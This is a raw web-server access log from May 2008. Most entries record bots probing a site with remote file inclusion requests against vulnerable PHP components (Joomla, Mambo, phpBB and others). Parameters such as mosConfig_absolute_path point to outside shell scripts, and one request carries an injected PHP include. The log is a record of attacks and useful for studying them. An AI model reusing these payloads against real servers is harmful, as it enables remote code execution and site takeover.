219.94.128.57 - - [16/May/2008:09:23:51 -0700] "GET /logs/access_071230.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:09:23:51 -0700] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.103.3.46 - - [16/May/2008:09:23:56 -0700] "GET / HTTP/1.1" 200 11606 "http://forums.off-road.com/jeep-short-wheelbase/162537-amc-jeep-cj10a-aircraft-tug-have-questions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:25:18 -0700] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:25:18 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:25:18 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:09:25:41 -0700] "GET /logs/access_080221.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:09:25:42 -0700] "GET /logs/access_071226.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:09:25:42 -0700] "GET /logs/access_080109.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:09:25:42 -0700] "GET /logs/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:26:39 -0700] "GET /retreat1/webcam/retreat1_00223.jpg HTTP/1.1" 200 16035 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:09:26:49 -0700] "GET /logs/access_080313.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:26:56 -0700] "GET /logs/access_080308.log/index.php?redir=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:27:01 -0700] "GET /logs/index.php?redir=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:27:02 -0700] "GET /index.php?redir=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:09:27:16 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:09:27:16 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:27:22 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:27:22 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:27:22 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:27:30 -0700] "GET /retreat1/webcam/retreat1_00227.jpg HTTP/1.1" 200 16166 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:27:31 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:27:31 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:27:32 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:27:36 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:27:46 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:09:27:57 -0700] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:09:27:57 -0700] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:28:34 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:09:28:46 -0700] "GET /logs//admin/addons/archive/archive.php?adminfolder=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:09:28:47 -0700] "GET //admin/addons/archive/archive.php?adminfolder=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:09:28:49 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:09:28:51 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
212.116.174.9 - - [16/May/2008:09:28:51 -0700] "GET //include/write.php?dir=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:09:28:55 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:09:28:55 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:09:28:56 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
212.116.174.9 - - [16/May/2008:09:29:00 -0700] "GET /logs//include/write.php?dir=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
80.67.23.140 - - [16/May/2008:09:29:06 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
80.67.23.140 - - [16/May/2008:09:29:06 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:29:28 -0700] "GET /retreat1/webcam/retreat1_00240.jpg HTTP/1.1" 200 15955 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
72.3.133.251 - - [16/May/2008:09:29:39 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.3.133.251 - - [16/May/2008:09:29:39 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.38.4.3 - - [16/May/2008:09:29:41 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
64.38.4.3 - - [16/May/2008:09:29:41 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:29:44 -0700] "GET /logs/access_080313.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:09:29:44 -0700] "GET /logs/access_080218.log//errors.php?error=http://www.phanom.ac.th/friendlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:29:49 -0700] "GET //?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:29:50 -0700] "GET /logs//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:29:58 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.34.226.154 - - [16/May/2008:09:30:02 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.34.226.154 - - [16/May/2008:09:30:02 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
67.15.62.72 - - [16/May/2008:09:30:06 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
67.15.62.72 - - [16/May/2008:09:30:06 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.107.130.4 - - [16/May/2008:09:30:09 -0700] "GET //update/update5.php?lang=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.107.130.4 - - [16/May/2008:09:30:09 -0700] "GET /logs//update/update5.php?lang=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:09:30:13 -0700] "GET /logs/index.php?pagina1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:09:30:13 -0700] "GET /logs/index.php?pagina1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:30:14 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:09:30:16 -0700] "GET /%3Cbug%3Ehttp://rooting.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:09:30:16 -0700] "GET /logs/%3Cbug%3Ehttp://rooting.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:30:18 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:09:30:19 -0700] "GET /index.php?pagina1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:30:21 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.84.34.22 - - [16/May/2008:09:30:21 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://owner.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
212.84.34.22 - - [16/May/2008:09:30:22 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://owner.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:09:30:25 -0700] "GET /index.php?pagina1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.80.134 - - [16/May/2008:09:30:25 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
209.62.80.134 - - [16/May/2008:09:30:25 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:09:30:38 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.107 - - [16/May/2008:09:30:44 -0700] "GET /logs/access.log HTTP/1.0" 200 66586 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.203.223.45 - - [16/May/2008:09:31:09 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
213.203.223.45 - - [16/May/2008:09:31:09 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
209.107.130.4 - - [16/May/2008:09:31:14 -0700] "GET //update/update4.php?lang=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.107.130.4 - - [16/May/2008:09:31:14 -0700] "GET /logs//update/update4.php?lang=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:09:31:16 -0700] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:09:31:16 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:09:31:16 -0700] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:09:31:17 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
211.43.212.8 - - [16/May/2008:09:31:26 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
211.43.212.8 - - [16/May/2008:09:31:26 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:31:34 -0700] "GET /logs/access_080218.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:31:40 -0700] "GET /logs/access_080207.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:32:10 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:32:11 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:32:11 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:32:15 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:32:15 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:32:18 -0700] "GET /logs/access_080226.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:32:20 -0700] "GET /retreat1/webcam/retreat1_00366.jpg HTTP/1.1" 200 15981 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:32:27 -0700] "GET /logs/access_080218.log//skin/zero_vote/ask_password.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:32:36 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:32:41 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:32:41 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:32:42 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:33:06 -0700] "GET /retreat1/webcam/retreat1_00371.jpg HTTP/1.1" 200 15598 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:33:22 -0700] "GET /logs/access_080327.log//admin/classes/TplLoad.php?full_path_to_public_program=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [16/May/2008:09:33:33 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
89.42.133.2 - - [16/May/2008:09:33:33 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:34:18 -0700] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.9.90 - - [16/May/2008:09:34:24 -0700] "GET /logs/access_080408.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:34:25 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:34:25 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:34:26 -0700] "GET /logs/access_071225.log//skin/zero_vote/ask_password.php?dir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:09:34:32 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://patch.mandul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [16/May/2008:09:34:34 -0700] "GET /logs/access_080302.log/modules/Neos_Chronos/header.php?base_folder=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [16/May/2008:09:34:34 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
